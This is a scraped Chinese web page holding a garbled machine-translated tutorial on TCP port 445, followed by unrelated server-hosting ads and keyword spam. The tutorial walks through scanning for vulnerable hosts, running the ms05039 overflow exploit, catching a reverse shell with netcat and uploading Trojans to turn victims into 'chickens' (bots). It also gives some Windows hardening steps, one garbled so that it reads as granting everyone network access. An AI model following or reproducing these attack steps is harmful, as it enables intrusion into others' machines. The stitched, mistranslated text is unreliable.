端口445端口(445 port)

445端口  时间:2021-04-18  阅读:()

445端口 445 port

Teach you 445 port attacks and prevention:

The 445 port is a port to get both praise and blame it, we caneasily access a variety of LAN in a shared folder or printersharing, but it is also because of it, hackers have a chance,they can pass through the port secretly sharing your hard drive,or even fall in your hard disk will be silent! What we can dois to think of away that hackers can take advantage of, blockingthe 445 port holes. For simplicity, in this paper, we takeWindows 2000 as an example, for Windows XP, the steps arebasically similar.

In the first step, what we need to do is to identify ahost with445 port vulnerabilities. You can scan it with scanning tools!SUPERSCAN, for example, is a port scanning tool.

The second step, assuming that we now have a host with a 445port vulnerability, we can use the Swiss Army knife NC and theoverflow tool ms05039 to attack:

F:\445>ms05039 target IP local IP 1234

. . . . . .

. . . . . .

F:\445>nc. exe -vv -l -p 1234

. . . . . .

. . . . . .

If you succeed, you will return to a shell, and then you canuse our usual commands. For example, let him download our Trojanhorse or upload a Trojan horse to him, and then run, so get achicken.

Do you think your computer is dangerous?Don't be afraid. Herewe are to remove this dangerous 445 port vulnerability:Attack methods against 445 port vulnerabilities:

1. port exclusion method

This method uses the port exclusion function of Windows 2000system, all packets from the 445 port will be banned

The evil guys can't get close to your mainframe, and here' s theconcrete implementation of this approach:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page, select the "Internet Protocol"(TCP/IP) item, and then click the "property" button to open the

Internet (TCP/IP) property settings page;

Click the page in the "advanced" button, open the advancedTCP/IP settings window, select the "options" label, and labelsin the pages of the "optional settings", "TCP/IP screen" isselected, and then click the "properties" button, open the TCP/IP screening set port;

The 445 port belongs to a TCP port, you can set at thecorresponding port "TCP", will "allow only" of selectedactivation following the "add" button, click the button in thewindow open by the add filter ", the service port number willmust be used, add come in, and will be less than the 445 portnumber excluded, after setting, click"OK"button, you can maketo take effect.

2. service shutdown method

Taking into account the folder or printer sharing service willuse to port 445, so directly to the folder or printer sharingservice stop, canalso realize the closure of 445 port to allowhackers to destroy all kinds of shared resources, the followingare the specific steps to close the folder or printer sharingservice:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,

select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page,

And in"this connectionuses the following selected components"list box, the "Microsoft network file or printer sharing"option before the cancellation number canceled, as shown infigure 2. Finally, click the "OK"button to restart the system,and the "big villains" on Internet have no access to all kindsof shared resources.

Of course, you can not stop sharing service conditions,deprivedof"sharedaccess rights are thewicked"; use the localsecurity settings in the user rights assignment function,specify anyusers on Internet have the right to access the localhost specific steps:

In the Windows 2000 start menu system, click the "program" and"management tools" and "local security settings" option, andthen expand the security settings "and" local policy "" userrights assignment "folder in the corresponding right sub windowto select"deny access to this computer from the network"option,and with the mouse left click on the;

Open the settings window, click the Add button, the pop-up"select auser or group dialog box, select the" everyone"option,and then click the Add button, finally click" OK", so that anyone user can access from the network to the local host.First look for chickens with MS05-039 vulnerabilities, and the

bugs open 445 and 139 ports,

Scan with a scanner

Next, exploit a vulnerability tool to attack a remotecalculator

Open the command prompt and enter ms05039. exe 192. 168.0.3

192. 168.0. 2 44661

Mean: 192. 168.0. 3 chicken IP address, 192. 168.0.2 is the localIP address, 4466 successful remote computing data overflowchicken will be connected to port 4466 on the local computer,1 on behalf of the remote chicken is Chinese version, Englishset 0. When successful execution of remote data overflowoperation, there will be a hint of successful overflow, suchas:

Trying to connect to remote port on 192. 168.0.3:445. . .ESTABLI SHED

Maki ng, nul l, se ssi on. . . OK

Trying, to, bind, pipe. . . OK

Trying, to, send, craf ted, packet. . . OK

Exploit done! Check your reverse shell on 192. 168.0.2:4466When the overflow is successful, immediately use NC (called theSwiss Army knife) to monitor the data that bounces back to the

4466 port of the machine.

Restart a command prompt, enter the command: NC -vv (two V) -l-p 4466 for data monitoring,

It will soon be able to monitor a remote SHELL withadministrator privileges.

So far, it has successfully entered the remote chicken system.At this time, you can upload Trojan horses through FTP, TFTP,etc.

ReliableSite:美国服务器租用,洛杉矶/纽约/迈阿密等机房;E3-1240V6/64GB/1TSSD,$95/月

reliablesite怎么样?reliablesite是一家于2006年成立的老牌美国主机商,主要提供独服,数据中心有迈阿密、纽约、洛杉矶等,均免费提供20Gbps DDoS防护,150TB月流量,1Gbps带宽。月付19美金可升级为10Gbps带宽。洛杉矶/纽约/迈阿密等机房,E3-1240V6/64GB内存/1TB SSD硬盘/DDOS/150TB流量/1Gbps带宽/DDOS,$95/月,...

tmhhost(100元/季)自带windows系统,香港(三网)cn2 gia、日本cn2、韩国cn2、美国(三网)cn2 gia、美国cn2gia200G高防

tmhhost可谓是相当熟悉国内网络情况(资质方面:ISP\ICP\工商齐备),专业售卖海外高端优质线路的云服务器和独立服务器,包括了:香港的三网cn2 gia、日本 cn2、日本软银云服务器、韩国CN2、美国三网cn2 gia 云服务器、美国 cn2 gia +200G高防的。另外还有国内云服务器:镇江BGP 大连BGP数据盘和系统盘分开,自带windows系统,支持支付宝付款和微信,简直就是专...

硅云香港CN2+BGP云主机仅188元/年起(香港云服务器专区)

硅云怎么样?硅云是一家专业的云服务商,硅云的主营产品包括域名和服务器,其中香港云服务器、香港云虚拟主机是非常受欢迎的产品。硅云香港可用区接入了中国电信CN2 GIA、中国联通直连、中国移动直连、HGC、NTT、COGENT、PCCW在内的数十家优质的全球顶级运营商,是为数不多的多线香港云服务商之一。目前,硅云香港云服务器,CN2+BGP线路,1核1G香港云主机仅188元/年起,域名无需备案,支持个...

445端口为你推荐
1f20;BACKGROUND-COLOR:#4ae2f7">16-bit支持ipad支持ipadx-router设置路由器是我的上网设置是x怎么弄联通版iphone4s苹果4S移动版和联通版有什么不同win7如何关闭445端口如何关闭445端口,禁用smb协议google图片搜索如何用google搜索空间照片谷歌sbgoogle一下"SB",虽然显示的是baidu排第一,链接的不是baidu.谷歌sb为什么搜索SB第一个是google?win7关闭135端口如何关闭135端口,关闭它有什么影响么?
中文国际域名 vps虚拟服务器 中国域名交易中心 美国主机论坛 美国主机代购 嘟牛 美国十次啦服务器 坐公交投2700元 静态空间 cdn加速原理 流媒体加速 多线空间 lick iki 杭州电信宽带优惠 国内空间 apnic 电信主机托管 godaddyssl cx域名 更多